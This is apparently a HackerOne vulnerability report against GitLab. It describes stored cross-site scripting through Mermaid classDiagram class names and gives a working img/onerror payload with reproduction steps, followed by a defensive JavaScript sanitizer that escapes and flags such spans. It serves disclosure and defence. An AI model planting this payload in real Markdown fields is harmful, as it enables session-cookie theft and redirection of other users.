
Stored XSS via Mermaid (classDiagram)

HackerOne report #1390391 by solov9ev on 2021-11-03, assigned to GitLab Team:


Report

Summary

Hi, Security Team!

I discovered a stored XSS vulnerability via Mermaid (classDiagram).

Steps to reproduce
  • Run GitLab: docker run --detach --hostname gitlab.example.com --publish 443:443 --publish 80:80 --publish 22:22 --name gitlab gitlab/gitlab-ce:latest (GitLab Enterprise Edition 14.4.1-ee)

  • Insert the following payload (classDiagram) into any field that supports Markdown with Mermaid:

classDiagram
class Square~<img/src='1'/onerror=alert()>~{
    int id
    List~int~ position
    setPoints(List~int~ points)
    getPoints() List~int~
}

Square : -List~string~ messages
Square : +setMessages(List~string~ messages)
Square : +getMessages() List~string~
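As an added defensive illustration (not Mermaid's or GitLab's code), the check below treats the text between classDiagram generic markers (~...~) as plain text: it HTML-escapes each span before the diagram reaches the renderer and reports spans that contained markup, which doubles as a detection signal for content like the report's payload. The sample diagram is the one from the report; the function names are assumptions.

```javascript
// Escape the five HTML metacharacters so markup in a generic span is shown
// literally by the browser instead of being parsed.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Find every ~...~ generic span on one line. Returns the escaped line and the
// raw content of any span that carried HTML metacharacters (for logging/alerting).
function sanitizeGenerics(line) {
  const findings = [];
  const out = line.replace(/~([^~]*)~/g, (_m, inner) => {
    if (/[<>"'&]/.test(inner)) findings.push(inner);
    return "~" + escapeHtml(inner) + "~";
  });
  return { out, findings };
}

// Apply the span check to a whole Mermaid source block, line by line.
function sanitizeDiagram(src) {
  const findings = [];
  const lines = src.split("\n").map((l) => {
    const r = sanitizeGenerics(l);
    findings.push(...r.findings);
    return r.out;
  });
  return { src: lines.join("\n"), findings };
}

// Sample input copied from the report above (the class name carries the markup).
const REPORT_DIAGRAM = [
  "classDiagram",
  "class Square~<img/src='1'/onerror=alert()>~{",
  "    int id",
  "    List~int~ position",
  "    setPoints(List~int~ points)",
  "    getPoints() List~int~",
  "}",
].join("\n");

const result = sanitizeDiagram(REPORT_DIAGRAM);
console.log(`${result.findings.length} generic span(s) contained markup and were escaped`);
console.log(result.src);
```

This is defence in depth in front of the renderer, not a substitute for the renderer sanitizing the labels it emits into the DOM.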


Impact

With this vulnerability, an attacker can, for example, steal users' cookies or redirect users to a malicious website.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: